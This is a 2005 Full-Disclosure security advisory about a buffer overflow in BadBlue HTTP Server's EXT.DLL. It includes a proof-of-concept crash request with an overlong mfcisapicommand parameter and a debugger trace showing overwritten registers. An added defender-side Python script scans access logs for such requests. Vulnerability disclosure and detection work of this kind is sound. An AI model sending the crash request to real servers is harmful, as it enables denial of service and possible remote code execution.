[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow

From: Andres Tarasco (atarasco_at_sia.es)
Date: 02/26/05

    To: "'full-disclosure@lists.netsys.com'" <full-disclosure@lists.netsys.com>
    Date: Sat, 26 Feb 2005 18:30:16 +0100

    SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer overflow

    * Release Date:
    February 26, 2005

    * Vendor:
    Working Resources Inc. http://www.badblue.com

    * Versions Affected:
    Confirmed under Badblue HTTP Server v2.55

    * Severity:
    Critical (Remote Code execution)

    * Summary:
    "BadBlue is not only a server, it's a complete file sharing system that is
    simply easier and faster to use than anything else. Why? Because BadBlue
    lets you use a tool you already know well: a web browser."
    "In seconds, you can turn your PC into a powerful web server. You can easily
    share photos, music, videos, and much more. With its simple menu-driven
    interface and pop-up wizards to guide you through setup, there's no faster
    way to share files"

    * Technical Details:
    SIA has discovered a buffer overflow in EXT.DLL, the module that handles
    BadBlue HTTP requests. The overflow is triggered by a specially crafted
    HTTP request: a malicious request whose mfcisapicommand parameter is
    longer than 250 characters overwrites several registers, so it is possible
    to execute code or to cause a denial of service by shutting down the
    server. The following request can be used to crash the remote server.

    GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

    Windbg trace:
    (360.21c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 edi=77e2b495
    eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
    *** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\BadBlue\PE\ext.dll -
    ext!GetExtensionVersion+0x13f7:
    10042004 8b3e mov edi,[esi] ds:0023:41414141=????????

    Successful exploitation of this flaw could allow remote code execution with
    Administrator rights.
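    As an added illustration from the defender's side (not part of the advisory), the
    following script scans web-server access-log lines for requests to /ext.dll whose
    mfcisapicommand parameter exceeds the 250-character threshold the advisory names.
    The Common Log Format layout and the sample lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Threshold taken from the advisory: mfcisapicommand values longer than
# 250 characters overwrite registers inside EXT.DLL.
MAX_MFCISAPICOMMAND_LEN = 250

# Common Log Format (assumed layout): the request line is the first quoted field.
_REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/\d\.\d"')

def check_request(method, target):
    """Return a finding for a request to /ext.dll whose mfcisapicommand
    parameter exceeds the threshold, or None for anything else."""
    url = urlsplit(target)
    if url.path.lower() != "/ext.dll":
        return None
    # parse_qsl percent-decodes values, so an encoded parameter is measured
    # at its decoded length, which is the length the server actually handles.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() == "mfcisapicommand" and len(value) > MAX_MFCISAPICOMMAND_LEN:
            return {"method": method, "param": name, "length": len(value)}
    return None

def scan_access_log(lines):
    """Return a list of (line number, finding) for every matching log line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        finding = check_request(m.group(1), m.group(2))
        if finding:
            findings.append((lineno, finding))
    return findings

# Constructed sample log lines (not real traffic): a normal request, one that
# mirrors the advisory's crash pattern, a percent-encoded variant, and a
# request to an unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Feb/2005:18:30:16 +0100] "GET /ext.dll?mfcisapicommand=list&page=index.htx HTTP/1.0" 200 512',
    '10.0.0.9 - - [26/Feb/2005:18:31:02 +0100] "GET /ext.dll?mfcisapicommand=' + "A" * 300 + '&page=index.htx HTTP/1.0" 500 0',
    '10.0.0.9 - - [26/Feb/2005:18:31:05 +0100] "GET /ext.dll?mfcisapicommand=' + "%41" * 260 + ' HTTP/1.0" 500 0',
    '10.0.0.7 - - [26/Feb/2005:18:32:00 +0100] "GET /index.htx HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for lineno, finding in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {finding}")
```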

    * Solution:
    Upgrade to the latest available version. At this time, the vendor provides
    version v2.6, which is available for download at
    http://www.badblue.com/bb98.exe

    * Credits:
    Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability

    * Disclosure Timeline:
    December 2004 - Discovered
    December 20, 2004 - Initial Vendor Notification
    December 21, 2004 - Initial Vendor Response
    January 3, 2005 - Vendor Patch released (v2.60)
    February 26, 2005 - Public Disclosure

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

